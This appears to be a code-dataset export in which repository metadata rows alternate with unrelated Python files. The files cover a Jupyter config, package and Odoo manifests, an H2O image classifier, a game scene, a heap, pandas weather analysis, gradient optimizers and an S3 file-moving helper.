# reference the current active figure. This mode facilitates iterative editing
# of figures, and behaves most consistently with other matplotlib backends, but
# figure barriers between cells must be explicit.
# c.InlineBackend.close_figures = True
# Subset of matplotlib rcParams that should be different for the inline backend.
# c.InlineBackend.rc = {'font.size': 10, 'figure.figsize': (6.0, 4.0), 'figure.facecolor': (1, 1, 1, 0), 'savefig.dpi': 72, 'figure.subplot.bottom': 0.125, 'figure.edgecolor': (1, 1, 1, 0)}
#------------------------------------------------------------------------------
# MappingKernelManager configuration
#------------------------------------------------------------------------------
# A KernelManager that handles notebook mapping and HTTP error handling
# MappingKernelManager will inherit config from: MultiKernelManager
#
# c.MappingKernelManager.root_dir = u'/Users/jhokanson/SVN/FlowML'
# The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
# c.MappingKernelManager.kernel_manager_class = 'IPython.kernel.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# NotebookManager configuration
#------------------------------------------------------------------------------
# Glob patterns to hide in file and directory listings.
# c.NotebookManager.hide_globs = [u'__pycache__']
#------------------------------------------------------------------------------
# FileNotebookManager configuration
#------------------------------------------------------------------------------
# FileNotebookManager will inherit config from: NotebookManager
# The directory name in which to keep notebook checkpoints
#
# This is a path relative to the notebook's own directory.
#
# By default, it is .ipynb_checkpoints
# c.FileNotebookManager.checkpoint_dir = '.ipynb_checkpoints'
# Glob patterns to hide in file and directory listings.
# c.FileNotebookManager.hide_globs = [u'__pycache__']
# Automatically create a Python script when saving the notebook.
#
# For easier use of import, %run and %load across notebooks, a <notebook-
# name>.py script will be created next to any <notebook-name>.ipynb on each
# save. This can also be set with the short `--script` flag.
# c.FileNotebookManager.save_script = False
#
# c.FileNotebookManager.notebook_dir = u'/Users/jhokanson/SVN/FlowML'
#------------------------------------------------------------------------------
# NotebookNotary configuration
#------------------------------------------------------------------------------
# A class for computing and verifying notebook signatures.
# The secret key with which notebooks are signed.
# c.NotebookNotary.secret = ''
# The file where the secret key is stored.
# c.NotebookNotary.secret_file = u''
# The hashing algorithm used to sign notebooks.
# c.NotebookNotary.algorithm = 'sha256'
| [
"jeffrey@hokanson.us"
] | jeffrey@hokanson.us |
fd791a584893677dea53bfac1e465f9e26f68440 | bd3bd2f1be4c408faa57b1c88a374f304fd8eaa6 | /setup.py | 7a7ba4d8a783fc59fb395b278a611abcdf5d9993 | [
"MIT"
] | permissive | Soebb/PyYouTube | bf8873333dfaa81b7ca8845123a69faee5301540 | 125b9f63b677eeece9d95790505a3818ed26c94d | refs/heads/main | 2023-07-13T16:43:27.154729 | 2021-08-12T21:16:11 | 2021-08-12T21:16:11 | 395,442,681 | 0 | 0 | MIT | 2021-08-12T21:00:40 | 2021-08-12T21:00:40 | null | UTF-8 | Python | false | false | 728 | py | import pathlib
import setuptools
file = pathlib.Path(__file__).parent
README = (file / "README.md").read_text()
setuptools.setup(
name="PyYouTube",
version="1.0.2",
author="mrlokaman",
author_email="ln0technical@gmail.com",
long_description = README,
long_description_content_type = "text/markdown",
description="Python library Get YouTube Video Data",
license="MIT",
url="https://github.com/lntechnical2/PyYouTube",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=setuptools.find_packages(),
install_requires = [],
python_requires=">=3.6",
)
| [
"noreply@github.com"
] | Soebb.noreply@github.com |
d862a18d54b56460bd7814306f7f05e308534c29 | 688cd4dd42ac526e7e995cb391eae2dfc2963e51 | /payroll_email/__manifest__.py | ca10fc6d56f5abf5d61c037de386ecaa2d5e42d2 | [] | no_license | tonyfreemind/odoo13_lajaraltd_custom_addons | 3f738cad326b841a42c3537aff1327b8154eaa9e | c569895999f3ec839520b9350d7b13509da22d04 | refs/heads/master | 2023-03-16T12:38:52.717824 | 2020-02-11T12:25:39 | 2020-02-11T12:25:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,810 | py | # -*- coding: utf-8 -*-
###################################################################################
# Payroll Email Project
#
# E-Soft Solution
# Copyright (C) 2018-TODAY E-Soft Solution (<https://www.sagarnetwork.com>).
# Author: Sagar Jayswal (<https://www.sagarnetwork.com>)
#
# This program is free software: you can modify
# it under the terms of the GNU Affero General Public License (AGPL) as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; See the GNU Affero General Public
# License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
###################################################################################
{
'name': 'Payroll Email/Mass E-mail',
'version': '12.0.1.0.0',
'summary': """Helps to send payroll Slip to Employees through Email.""",
'description': 'This module helps you to send payslip through Email.',
'category': 'Generic Modules/Human Resources',
'author': 'E-soft Solution',
'company': 'E-Soft Solution',
'website': "https://www.sagarnetwork.com",
'depends': ['base', 'hr_payroll_community', 'mail', 'hr'],
'data': [
# 'security/ir.model.access.csv',
'data/mail_template.xml',
'views/hr_payroll.xml',
'views/hr_payslip_wizard_view.xml',
'views/hr_mass_payroll_wizard.xml'
],
'demo': [],
'images': ['static/description/banner.png'],
'license': 'AGPL-3',
'installable': True,
'auto_install': False,
'application': False,
}
| [
"imbipul9@gmail.com"
] | imbipul9@gmail.com |
96b504a735cf6e04622a461658a2dbab9ebb16dd | 8f428e090b7b54868d55f7772c3bb22701d0fbd8 | /coil_20_deeplearning.py | c8a5060573dd49ff9f326a7c12165c3adb0e720b | [] | no_license | LPTgrumpycats/deeplearning | e16fe9296441e4d4e0fa56b9e7c366e47c2b44b1 | 79bf9595ab9e63b9c3ecc118dfd79a20a14e6064 | refs/heads/master | 2020-12-29T02:19:00.062773 | 2015-12-01T23:46:30 | 2015-12-01T23:46:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | __author__ = 'vincentpham'
import glob
from PIL import Image
import numpy as np
import csv
import time
import h2o
from h2o.estimators.deeplearning import H2ODeepLearningEstimator
files = glob.glob("coil-20-proc/*.png")
n = len(files)
files_split__ = [x.split("__") for x in files]
obj_id = [[x[0].split("/")[1],x[1].split(".")[0]] for x in files_split__]
#Inspecting png file
im = Image.open(files[0])
im.size #128x128
#Split into 20% Testing and 80% training
for i in range(n):
im = Image.open(files[i])
pix = im.load()
pix_array = np.array(im)
pix_array = np.reshape(pix_array,-1)
pix_list = pix_array.tolist()
if i%5==0:
with open("obj_file_test.csv", "a") as f:
writer = csv.writer(f)
writer.writerow([obj_id[i][0]] + pix_list)
else:
with open("obj_file_train.csv", "a") as f:
writer = csv.writer(f)
writer.writerow([obj_id[i][0]] + pix_list)
print "done writing"
h2o.init()
train = h2o.import_file("obj_file_train.csv")
test = h2o.import_file("obj_file_test.csv")
y = train.names[0]
x = train.names[1:]
#Encode the response columns as categorical for multinomial classification
train[y] = train[y].asfactor()
test[y] = test[y].asfactor()
start_time = time.time()
# Train Deep Learning model and validate on test set
model = H2ODeepLearningEstimator(distribution="multinomial",
activation = "RectifierWithDropout",
hidden = [400,600,400,600],
input_dropout_ratio= .2,
sparse = True,
l1 = 1e-5,
max_w2 = 10,
train_samples_per_iteration=-1,
classification_stop=-1,
stopping_rounds=0,
epochs = 200)
model.train(x=x,
y=y,
training_frame = train,
validation_frame = test)
pred = model.predict(test)
pred.head() #not working?
test_np = test.as_data_frame()[0]
test_np = test_np[1:]
pred_np = pred.as_data_frame()[0]
pred_np = pred_np[1:]
wrong = 0
for i in range(len(pred_np)):
if test_np[i] != pred_np[i]:
wrong += 1
acc = 1 - wrong/float(len(pred_np))
print(acc)
end_time = time.time()
total_time = round(end_time - start_time,2)
print(total_time)
h2o.shutdown()
#200x400x200 epoch = 10 -> 0.204861111111
#200x400x200 epoch = 100 -> [0.684027777778,0.739583333333] time = [,292.06]
#200x400x200x400 epoch = 100 -> [0.881944444444,0.715277777778] time = [,277.55]
#200,400,200,400,200 epoch = 100 -> 0.524305555556 time = 256.48
#300x500x300 epoch = 100 -> 0.9375 time = 409.3
#400x600x400 epoch = 100 -> 0.944444444444 time = 483.1
#400x600x400x600 epoch = 100 -> [0.989583333333,0.986111111111] time = [552.86,460.22]
#400x600x400x600x600 epoch = 100 -> 0.913194444444 time = 488.3
#500x600x500x600 epoch = 100 -> 0.986111111111 time = 481.0 | [
"vincentpham@gmail.com"
] | vincentpham@gmail.com |
42681a8005087fdf5af45ee8ea50da01ea85163e | 1764954b63a7033663545c0cc621bb45cfef5248 | /game/scenes/test_scene.py | 8ea6c44912c9de8bbbffb00a6cd0f9e8c5b7cecf | [] | no_license | shelsoloa/AgentObie | c9c5b2979e59a649a9148f3e1e5ebe06dfa7efa1 | 69d0c42a2674b20775dcc3d8578a8468739e0d45 | refs/heads/master | 2020-04-24T06:52:14.497763 | 2019-02-21T01:49:47 | 2019-02-21T01:49:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | from peachy import PC
from game.scenes import Message, Scene, \
wait, wait_for_actor, wait_for_input, wait_for_message
from game.scenes.actors import Obie
class TestScene(Scene):
def __init__(self, world):
super().__init__(world)
def advance(self):
# Create actors
obie = Obie(50, PC().canvas_width / 4)
obie.sprite.play('RUN')
message = Message([
"Looks like Agent Obie will have dialogue...",
"How exciting!"],
obie.x - 16, 42, obie)
self.actors.append(obie) # Show actor
yield from wait_for_input()
dx = message.x + Message.BOX_WIDTH - 16
obie.move_to(dx, obie.y, 2000)
message.move_to(dx - Message.BOX_WIDTH / 2, message.y, 2000)
self.messages.append(message) # Show message
yield from wait_for_message(message)
yield from wait_for_actor(obie)
yield from wait_for_input()
self.messages.remove(message)
obie.move_to(PC().canvas_width / 2, obie.y, 1500)
yield from wait_for_actor(obie)
yield from wait(1000)
yield
| [
"a.sheldon.sol@gmail.com"
] | a.sheldon.sol@gmail.com |
510d5d810326d3d4bf1e76e31d39fa76b91e1e99 | 7d476485673b3e0904a0120ee9973a2e2b603c8d | /4เหลี่ยม.py | 17984e53dee4d972ca63934815095aa0d48fa737 | [] | no_license | KARGOREO/Test.com | f8b1948c9354631eea3af08e1a91ccefda1dfc2f | f282ffddabcfacf0c453831e9c423c33ce040f87 | refs/heads/main | 2023-03-15T01:21:27.690994 | 2021-03-24T12:51:22 | 2021-03-24T12:51:22 | 351,050,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | def V2():
width = 12
xlong = 13
area = width * xlong
print("พื้นที่สี่เหลี่ยมผืนผ้ามีค่าเท่ากับ %.2f" % area)
V2() | [
"oppwerq@gmail.com"
] | oppwerq@gmail.com |
bb12b060c5d0a70a3b69d0c5c11ae3e745a880c0 | c57f97c6eac08f91814d3144f6e2b1cc066438ce | /ai/testers/minheap.py | 94d23405cf7abce4c56e1f75b7e1d89be2c23da9 | [] | no_license | Michael-Nath-HS/MKS21X | 92853f708539693d86ee113adde6db0b6ca4bed0 | 28c3fb200947ee202530899bbbd29458a72872ea | refs/heads/master | 2022-04-08T11:10:55.236277 | 2020-02-12T12:11:59 | 2020-02-12T12:11:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | from math import floor
class Node:
def __init__(self, v):
self.data = v
self.position = None
def __str__(self):
return "NODE WITH VALUE: %d" % self.data
class Pqueue:
def __init__(self):
self.listy = [None]
def push(self, v):
anode = Node(v)
listy = self.listy
if len(listy) == 1:
anode.position = 1
listy.append(anode)
return
listy.append(anode)
anode.position = len(listy) - 1
par = listy[floor(anode.position / 2)]
def helper(arg):
node = arg
par = listy[floor(node.position / 2)]
par.data, node.data = node.data, par.data
node, par = par, node
par = listy[floor(node.position / 2)]
if par is None:
return
else:
if par.data > node.data:
helper(node)
if par.data > anode.data:
helper(anode)
return "Inserted %d" % v
def tolist(self):
queue = [x.data if x is not None else None for x in self.listy]
if len(queue) > 1:
return queue[1:]
def peek(self):
listy = self.listy
if len(listy) == 1:
return None
return listy[1]
def pop(self):
listy = self.listy
if len(listy) == 1:
return None
last = listy[-1]
beg = listy[1]
beg.data = last.data
del listy[-1]
node = listy[1]
while 2 * node.position + 1 < len(listy) :
try:
kidL = listy[(2 * node.position)]
except:
kidL = None
try:
kidR = listy[(2 * node.position) + 1]
except:
kidR = None
heap = Pqueue()
print(heap.push(1))
print(heap.push(5))
print(heap.push(4))
print(heap.push(9))
print(heap.push(8))
print(heap.push(7))
print(heap.push(10))
print(heap.tolist())
print(heap.pop())
print(heap.tolist())
| [
"mnath10@stuy.edu"
] | mnath10@stuy.edu |
80e3d5c7c10df49f602e4e750ced29e5821160f1 | 6a342f0c303cd41f2d2a80a2e8a118c86fc6d003 | /pandasExercise.py | 3b36b36a1149263b9a90dde4a77cabef3bf8109a | [] | no_license | QwertyAswal/pandas | 9b51acdb9a2df8ba0556de9ba0f57307805da5b7 | 93cce015407ec2e4af2e413119cb8c42cdc0875e | refs/heads/master | 2020-06-18T13:42:50.550684 | 2019-07-11T05:09:51 | 2019-07-11T05:09:51 | 196,321,391 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,075 | py | import pandas as pd
def findOut(df):
ls = []
maxVal = df['TEMP'].mean() + 2 * df['TEMP'].std()
minVal = df['TEMP'].mean() - 2 * df['TEMP'].std()
for i in df['TEMP']:
if (i >= minVal and i <= maxVal):
ls.append(True)
else:
ls.append(False)
return ls
def toCelcius(df):
li = []
for i in df['TEMP']:
li.append((i - 32) * 5 / 9)
return li
def toInt(df):
li = []
for i in df['Celsius']:
li.append(round(i))
return li
def getNew(df):
li = []
for i in df['YR--MODAHRMN']:
li.append(i // 100)
return li
# question 1
df = pd.read_csv('6153237444115dat.csv', na_values=['*', '**', '***', '****', '*****', '******'])
print("Rows:- ", df.__len__())
print("Columns:- ", *df.columns)
print("Column Types:- \n", df.dtypes)
print("Mean Temp:- ", df['TEMP'].mean())
print("Standard Deviation Max Temp:- ", df['MAX'].std())
ls = df['USAF'].unique()
print(ls.__len__())
# find outer
df['Outer'] = findOut(df)
# exercise 2
selected = pd.DataFrame({'USAF': list(df['USAF']), 'YR--MODAHRMN': list(df['YR--MODAHRMN']), 'TEMP': list(df['TEMP']),
'MAX': list(df['MAX']), 'MIN': list(df['MIN'])})
selected = selected.dropna(axis=0, how='any', subset=['TEMP'])
li = toCelcius(selected)
selected['Celsius'] = li
selected['Celsius'] = toInt(selected)
selectedUSAF = selected.groupby('USAF')
kumpula = selectedUSAF.get_group(29980)
kumpula.to_csv('Kumpula_temps_May_Aug_2017.csv')
rovaniemi = selectedUSAF.get_group(28450)
rovaniemi.to_csv('Rovaniemi_temps_May_Aug_2017.csv')
# exercise 3
li = list(kumpula['TEMP'])
print("Median Kumpula:- ", li[li.__len__() // 2])
li = list(rovaniemi['TEMP'])
print("Median Rovaniemi:- ", li[li.__len__() // 2])
kumpula_may = kumpula[kumpula['YR--MODAHRMN'] // 1000000 == 201705]
kumpula_june = kumpula[kumpula['YR--MODAHRMN'] // 1000000 == 201706]
rovaniemi_may = rovaniemi[rovaniemi['YR--MODAHRMN'] // 1000000 == 201705]
rovaniemi_june = rovaniemi[rovaniemi['YR--MODAHRMN'] // 1000000 == 201706]
print("Kumpala:-")
print("May:-")
print("Mean:-", kumpula_may['TEMP'].mean())
print("Min:-", kumpula_may['TEMP'].min())
print("Max:-", kumpula_may['TEMP'].max())
print("June:-")
print("Mean:-", kumpula_june['TEMP'].mean())
print("Min:-", kumpula_june['TEMP'].min())
print("Max:-", kumpula_june['TEMP'].max())
print("Rovaniemi:-")
print("May:-")
print("Mean:-", rovaniemi_may['TEMP'].mean())
print("Min:-", rovaniemi_may['TEMP'].min())
print("Max:-", rovaniemi_may['TEMP'].max())
print("June:-")
print("Mean:-", rovaniemi_june['TEMP'].mean())
print("Min:-", rovaniemi_june['TEMP'].min())
print("Max:-", rovaniemi_june['TEMP'].max())
# exercise 4
liNew = getNew(df)
df['HRNEW'] = liNew
hour = []
mea = []
ma = []
mi = []
newData = df.groupby('HRNEW')
for i, j in newData:
hour.append(i)
mea.append(j["TEMP"].mean())
ma.append(j["TEMP"].max())
mi.append(j['TEMP'].min())
lastDF = pd.DataFrame({'Hour': hour, 'Mean': mea, 'Max': ma, 'Min': mi})
print(lastDF)
lastDF.to_csv('LastCSV.csv', index=False)
| [
"noreply@github.com"
] | QwertyAswal.noreply@github.com |
e10af10c17a74257c1bfab627cc04fe39b25b1b7 | 96903069c6f109f5a7b7d88ec8cd3f334db8b370 | /backend/backend/urls.py | 75ad6128f0c57086839af3de97c520c4ea0f8417 | [] | no_license | luisthume/projeto_dashboard | b4e97635daf94be65246a1f77ac807242e91755b | d136dd3d2b1841ffd939faf90cc5cacb0980ff4e | refs/heads/master | 2023-03-04T11:17:41.312157 | 2021-02-06T23:25:25 | 2021-02-06T23:25:25 | 332,869,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | """backend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('api/test/', include('api.urls')),
]
| [
"luisltcs@gmail.com"
] | luisltcs@gmail.com |
de0ac26b4417af4cfa68ee5a2c5214e54a9f3c18 | 86109bf63dcf43d180738102973df847ea631f7b | /03/vesnice.py | a810a8c4b122535fdc47153de6c01be17238a8d0 | [] | no_license | HanaKarbanova/pyladie.cz | afa103042ba45c5d3a82fd27ba444985aae23c5c | c6aa56430d689ff69243467949d8a191319589c6 | refs/heads/master | 2020-07-02T18:59:53.571701 | 2016-11-20T17:19:18 | 2016-11-20T17:19:18 | 74,288,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | #zde se kreslí vesnice
from turtle import forward, left, right, penup, pendown, exitonclick
from math import sqrt
strana=float(input('Jak je dlouhá strana?:'))
velikost = int(input('Kolik chceš baráčků:'))
penup()
left(180)
forward(300)
pendown()
right(180)
#setpoint(300)
for i in range(velikost):
left(90)
forward(strana)
right(135)
forward(sqrt(2)*strana)
right(135)
forward(strana)
right(135)
forward(sqrt(2)*strana)
left(135)
forward(strana)
right(135)
forward((sqrt(2)*strana)/2)
right(90)
forward((sqrt(2)*strana)/2)
right(45)
forward(strana)
left(90)
forward(20)
print("Vesnice postavena;o)")
exitonclick()
| [
"hana@karbanova.cz"
] | hana@karbanova.cz |
450743dde646e0a0b66802c629ddb6cf7f9b9ee1 | def5022618e9f142fc5ea107ab70ab7aa57b0432 | /common/optimizer.py | fa24580e14f0ede35045d2fa53a9066b03f4126f | [] | no_license | iDMatlab/EEG-P300Speller-Toolkit | a0d4bdc41f0ea8ca2bc4985fe4b69ba82dfb1410 | d754fb6568229c9de5f5cfadfa1c5532945654f0 | refs/heads/master | 2023-04-15T23:33:11.172432 | 2019-10-23T07:58:54 | 2019-10-23T07:58:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,894 | py | # -*- coding: utf-8 -*-
import numpy as np
from scipy.optimize import fmin_l_bfgs_b
from abc import ABCMeta, abstractmethod
class GradientDescentOptimizer(object):
__metaclass__ = ABCMeta
@abstractmethod
def minimize(self, fojb, x0, args):
raise NotImplementedError()
class AdamOptimizer(GradientDescentOptimizer):
def __init__(self, maxit=500, stopeps=1e-6):
self.maxit = maxit
self.stopeps = stopeps
def minimize(self, fobj, x0, args):
alpha = 0.01
beta_1 = 0.9
beta_2 = 0.999 # initialize the values of the parameters
epsilon = 1e-8
it = 0
m_t = 0
v_t = 0
theta_0 = x0
d_theta = np.Inf
while (d_theta > self.stopeps) and (it < self.maxit): # till it gets converged
it = it + 1
theta_prev = theta_0
f_t, g_t = fobj(theta_0, *args)
m_t = beta_1 * m_t + (1 - beta_1) * g_t # updates the moving averages of the gradient
v_t = beta_2 * v_t + (1 - beta_2) * (g_t * g_t) # updates the moving averages of the squared gradient
m_cap = m_t / (1 - (beta_1 ** it)) # calculates the bias-corrected estimates
v_cap = v_t / (1 - (beta_2 ** it)) # calculates the bias-corrected estimates
theta_0 = theta_0 - (alpha * m_cap) / (np.sqrt(v_cap) + epsilon) # updates the parameters
d_theta = np.linalg.norm(theta_0-theta_prev)
print('Iteration %d: FuncValue = %f, d_theta = %f' % (it, f_t, d_theta))
return theta_0
class LbfgsOptimizer(GradientDescentOptimizer):
def __init__(self, maxit=500, stopeps=1e-5):
self.maxit = maxit
self.stopeps = stopeps
def minimize(self, fobj, x0, args):
theta, obj, info = fmin_l_bfgs_b(fobj, x0, args=args, maxiter=self.maxit, epsilon=self.stopeps, disp=1)
return theta | [
"44161787+stephen-hjay@users.noreply.github.com"
] | 44161787+stephen-hjay@users.noreply.github.com |
cce157999454496287f57ee49815b75ccd807999 | f077ad4cf886976e82d3bd1befa99711263f8c4f | /homework/HW3/HW3-final/P2B.py | ce4a84e1e494d2a095913fbfcbb779b3a3d2c43c | [] | no_license | vditomasso/cs107_victoria_ditomasso | ff9263a7034bbf6586e2c046679f3b6e9419d92b | 2df8d4562159f0bfa7f2c78984df2a84ab82e165 | refs/heads/master | 2023-01-29T03:50:49.929143 | 2020-12-10T19:26:46 | 2020-12-10T19:26:46 | 291,739,733 | 0 | 0 | null | 2020-12-10T19:26:47 | 2020-08-31T14:35:50 | Jupyter Notebook | UTF-8 | Python | false | false | 76 | py | #!/usr/bin/env python3
from Regression import Regression as reg
help(reg)
| [
"victoriaditomasso@Victorias-MacBook-Pro.local"
] | victoriaditomasso@Victorias-MacBook-Pro.local |
b71af90781dd820c929003a9e1a46da4ff098c1a | c6600947c3654cdf10ee00543da086c2eeb81c92 | /GourdianTest/s3.py | 894e1ca121f27568de6abc8ca8f1ee8d2c2c1f95 | [] | no_license | javadevelopr/GourdianOracle | 42a298a378111e412543a0c184a2394203f52650 | 246b8e241a896086ab7b6d1b6cb8bb6bef2aa44c | refs/heads/master | 2022-12-15T20:30:33.838779 | 2020-09-07T17:15:22 | 2020-09-07T17:15:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,972 | py | #!/usr/bin/env python
# File Name: chunk.py
#
# Date Created: Feb 16,2020
#
# Last Modified: Tue Feb 25 18:12:03 2020
#
# Author: samolof
#
# Description:
#
##################################################################
import boto3
import botocore
from os.path import basename
import datetime
import hashlib
import os
import tempfile
import logging
from tagger import tag
from typing import Union, List, Dict, Optional, Callable
_sanitizeFN = lambda f: f.endswith('/') and f.rstrip('/') or f
def moveCanon(s3BucketName: str, s3canonPrefix: str, s3destPrefix: str):
s3 = S3Operator(s3bucketName)
#use filename extension(tag.timestamp) to get new timestamp of this version
#and use as new folder name
fileName = s3.getObjNames(s3canonPrefix)[0]
versionTimeStamp = fileName.split('.')[1]
s3.moveAllFilesInFolder(s3canonPrefix, s3destPrefix + '/' + versionTimeStamp)
class S3Operator(object):
def __init__(self, bucketName: str, aws_access_id: str=None, aws_secret_access_key: str=None):
self.s3 = boto3.resource('s3')
self.s3c = boto3.client('s3')
self.bucket = self.s3.Bucket(bucketName)
self.bucketName = self.bucket.name
def getObjNames(self, prefix: str, ignoreFolders: bool = False):
fileNames = []
for obj in self.bucket.objects.filter(Prefix=prefix):
key = obj.key
if os.path.basename(key) == '_SUCCESS': #ignore Spark special file
continue
if obj.key == prefix + "/": #ignore the base folder itself
continue
fileNames.append(key)
if ignoreFolders:
fileNames = list(filter(lambda f: not f.endswith('/'), fileNames))
return fileNames
def upload(self, filename:str, s3path:str, bucketName: Optional[str]=None):
bucketName = bucketName or self.bucket.name
try:
selfs3c.upload_file(filename, bucketName, s3path)
except OSError as e:
raise
def download(self, s3objName:str):
currentdir = os.getcwd()
try:
tempdir = tempfile.gettempdir()
os.chdir(tempdir)
self.s3c.download(self.bucket.name, s3objName, os.path.basename(s3objName))
except OSError as e:
raise
finally:
os.chdir(currentdir)
return tempdir + "/" + os.path.basename(s3objName)
def copyFile(self, s3srcPath:str, s3destPath:str):
srcPath = f"{self.bucket.name}/{s3srcPath}"
self.s3.Object(self.bucket.name, s3destPath).copy_from(CopySource=srcPath)
def moveFile(self, s3srcPath:str, s3destPath:str):
self.copyFile(s3srcPath, s3destPath)
self.s3.Object(self.bucket.name, s3srcPath).delete()
def createFolder(self,folderName:str, s3Prefix:str = None ):
if prefix == "":
prefix = None
key = prefix and f"{prefix}/{folderName}/" or f"{folderName}/"
resp = self.s3c.put_object(Bucket=self.bucketName, Key=key)
if resp['ResponseMetadata']['HTTPStatusCode'] not in range(200,210):
raise
def moveAllFilesInFolder(self, s3srcFolder:str, s3destFolder: str):
s3srcFolder = _sanitizeFN(s3srcFolder)
s3destFolder = _sanitizeFN(s3destFolder)
try:
self.s3.Object(self.bucketName, s3destFolder + "/").load()
except botocore.exceptions.ClientError as e:
if e.response["Error"]["Code"] == "404":
prefix = os.path.dirname(s3destFolder)
folderName = os.path.basename(s3desFolder)
self.createFolder(os.path.basename(s3destFolder), os.path.dirname(s3destFolder))
else:
raise
fileNames = self.getObjNames(s3srcFolder, ignoreFolders=True)
for f in fileNames:
f = os.path.basename(f)
self.moveFile(s3srcFolder + f"/{f}", s3destFolder + f"/{f}")
| [
"java.developer.cl@gmail.com"
] | java.developer.cl@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.